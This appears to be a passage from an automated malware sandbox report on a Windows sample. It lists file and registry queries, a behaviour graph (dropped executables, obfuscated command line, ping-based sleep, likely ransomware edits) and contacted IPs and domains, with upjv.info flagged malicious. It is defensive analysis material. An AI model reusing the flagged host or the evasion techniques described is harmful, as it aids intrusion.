Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\mr.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ms.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nb.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ne.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nl.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\nn.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pa-in.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pl.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ps.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pt-br.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\pt.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ro.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ru.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sa.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\si.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sk.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sl.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sq.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sr-spc.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sr-spl.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\sv.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ta.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\th.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\tr.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\tt.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\ug.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\uk.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\uz.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\va.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\vi.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\yo.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\zh-cn.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\Lang\zh-tw.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\License.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\readme.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon.ico VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_128.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_16.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_32.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appicon_75.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appinfo.ini VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\7-ZipPortable.ini VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\Custom.nsh VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\Launcher\splash.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\pac_installer_log.ini VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\7zip_portable.reg VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\DefaultData\settings\settings_readme.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\readme.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\help.html VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Donation_Button.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Favicon.ico VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Background_Footer.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Background_Header.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Help\images\Help_Logo_Top.png VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\AppNamePortable.ini VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\LauncherLicense.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\PortableApps.comInstallerCustom.nsh VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\Other\Source\Readme.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\log.txt VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Queries volume information: C:\Users\user\TMP\cr-20241021-53901\null VolumeInformation Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C586FB GetSystemTimeAsFileTime, 10_2_00C586FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00407551 LoadLibraryA,GetProcAddress,GetVersionExA, 0_2_00407551
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538480 Sample: SecuriteInfo.com.W32.Possib... Startdate: 21/10/2024 Architecture: WINDOWS Score: 76 56 upjv.info 2->56 58 youtube-ui.l.google.com 2->58 60 34 other IPs or domains 2->60 72 Multi AV Scanner detection for submitted file 2->72 74 Machine Learning detection for sample 2->74 76 AI detected suspicious sample 2->76 78 Yara detected BatToExe compiled binary 2->78 8 SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe 6 2->8         started        11 firefox.exe 1 2->11         started        signatures3 process4 file5 48 C:\Users\user\Desktop\ariac.exe, PE32+ 8->48 dropped 13 cmd.exe 22 8->13         started        17 conhost.exe 8->17         started        19 firefox.exe 3 230 11->19         started        process6 dnsIp7 50 C:\Users\user\TMP\...\ariac.exe, PE32+ 13->50 dropped 80 Obfuscated command line found 13->80 82 Uses ping.exe to sleep 13->82 84 Uses ping.exe to check the status of other devices and networks 13->84 86 Modifies existing user documents (likely ransomware behavior) 13->86 22 clean.exe 182 13->22         started        25 ariac.exe 4 13->25         started        28 PING.EXE 1 13->28         started        36 10 other processes 13->36 62 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49746, 49763, 49789 GOOGLEUS United States 19->62 64 push.services.mozilla.com 34.107.243.93, 443, 49803, 49866 GOOGLEUS United States 19->64 66 8 other IPs or domains 19->66 52 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 19->52 dropped 54 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 19->54 dropped 30 firefox.exe 19->30         started        32 firefox.exe 19->32         started        34 firefox.exe 19->34         started        file8 signatures9 process10 dnsIp11 38 C:\Users\user\TMP\...\7zG.exe, PE32 22->38 dropped 40 C:\Users\user\TMP\...\7zFM.exe, PE32 22->40 dropped 42 C:\Users\user\TMP\...\7zCon.sfx, PE32 22->42 dropped 46 13 other files (none is malicious) 22->46 dropped 68 upjv.info 46.105.204.6, 49704, 49706, 49745 OVHFR France 25->68 44 C:\Users\user\TMP\...\clean.exe, PE32 25->44 dropped 70 127.0.0.1 unknown unknown 28->70 file12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
46.105.204.6
 upjv.info France
16276 OVHFR true
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
52.222.236.120
 services.addons.mozilla.org United States
16509 AMAZON-02US false
35.201.103.21
 normandy-cdn.services.mozilla.com United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.0.35 true
upjv.info 46.105.204.6 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 52.222.236.120 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 216.58.212.174 true
reddit.map.fastly.net 151.101.193.140 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.170 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://upjv.info/favicon.ico false
    		unknown